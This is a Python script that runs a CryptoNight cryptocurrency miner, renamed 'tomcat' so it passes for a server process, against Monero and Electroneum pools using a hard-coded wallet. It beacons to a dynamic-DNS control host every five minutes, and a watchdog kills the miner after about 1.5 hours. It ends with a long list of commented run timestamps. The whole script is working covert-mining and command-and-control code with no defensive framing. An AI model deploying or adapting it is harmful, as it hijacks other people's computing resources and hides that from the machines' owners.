import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:01.400394
#2018-02-17 17:28:06.300991
#2018-02-17 19:17:03.203234
#2018-02-17 21:06:05.607405
#2018-02-17 22:50:04.536449
#2018-02-18 00:34:07.750541
#2018-02-18 02:25:04.567483
#2018-02-18 04:11:08.085956
#2018-02-18 06:03:04.250612
#2018-02-18 07:52:05.125456
#2018-02-18 09:41:01.726039
#2018-02-18 11:26:04.857109
#2018-02-18 13:12:02.196922
#2018-02-18 15:01:04.501177
#2018-02-18 16:49:06.957869
#2018-02-18 18:37:05.219930
#2018-02-18 20:25:01.520229
#2018-02-18 22:11:05.937347
#2018-02-18 23:58:05.245404
#2018-02-19 01:44:04.387014
#2018-02-19 03:32:03.569900
#2018-02-19 05:17:01.383882
#2018-02-19 07:03:05.979452
#2018-02-19 08:53:04.624755
#2018-02-19 10:42:07.314049
#2018-02-19 12:29:07.814449
#2018-02-19 14:17:04.758205
#2018-02-19 16:06:04.694021
#2018-02-19 17:55:06.199494
#2018-02-19 19:41:07.876404
#2018-02-19 21:29:06.430311
#2018-02-19 23:15:10.674301
#2018-02-20 01:02:05.303722
#2018-02-20 02:51:03.904911
#2018-02-20 04:38:06.653547
#2018-02-20 06:22:05.573778
#2018-02-20 08:07:02.203432
#2018-02-20 09:52:04.186335
#2018-02-20 11:36:04.845936
#2018-02-20 13:25:05.149226
#2018-02-20 15:09:05.884206
#2018-02-20 16:55:08.872570
#2018-02-20 18:44:01.684485
#2018-02-20 20:35:08.329591
#2018-02-20 22:19:07.869215
#2018-02-21 00:01:05.152850
#2018-02-21 01:46:03.698715
#2018-02-21 03:39:01.823853
#2018-02-21 05:27:05.365291
#2018-02-21 07:16:01.443286
#2018-02-21 09:01:01.507476
#2018-02-21 10:49:04.922561
#2018-02-21 12:36:09.247612
#2018-02-21 14:22:08.952097
#2018-02-21 16:09:08.490363
#2018-02-21 17:59:01.302057
#2018-02-21 19:47:08.485637
#2018-02-21 21:33:03.884589
#2018-02-21 23:18:05.825702
#2018-02-22 01:08:07.307409
#2018-02-22 02:56:01.731686
#2018-02-22 04:43:07.891724
#2018-02-22 06:29:05.992515
#2018-02-22 08:16:03.709152
#2018-02-22 10:04:09.164301
#2018-02-22 11:48:12.596265
#2018-02-22 13:34:06.926612
#2018-02-22 15:22:04.625643
#2018-02-22 17:06:12.330806
#2018-02-22 18:53:08.397990
#2018-02-22 20:46:02.005053
#2018-02-22 22:32:01.612421
#2018-02-23 00:16:08.058302
#2018-02-23 02:07:05.571351
#2018-02-23 03:53:05.594106
#2018-02-23 05:40:08.616820
#2018-02-23 07:25:03.037718
#2018-02-23 09:29:06.919851
#2018-02-23 11:37:06.521861
#2018-02-23 13:27:04.417020
#2018-02-23 15:13:04.882352
#2018-02-23 17:03:05.810626
#2018-02-23 18:52:02.032235
#2018-02-23 20:38:05.727935
#2018-02-23 22:25:01.308345
#2018-02-24 00:09:08.001504
#2018-02-24 02:02:02.020870
#2018-02-24 03:52:05.867125
#2018-02-24 03:53:01.391683
#2018-02-24 05:39:05.246969
#2018-02-24 07:31:05.178732
#2018-02-24 09:17:06.956099
#2018-02-24 11:05:03.987029
#2018-02-24 12:53:06.789381
#2018-02-24 14:41:05.815608
#2018-02-24 16:32:04.465749
#2018-02-24 18:22:05.132243
#2018-02-24 20:08:07.243512
#2018-02-24 21:52:05.363855
#2018-02-25 00:53:03.841277
#2018-02-25 03:53:01.549406
#2018-02-25 06:38:03.929532
#2018-02-25 11:36:02.196630
#2018-02-25 13:51:01.555868
#2018-02-25 15:25:02.606328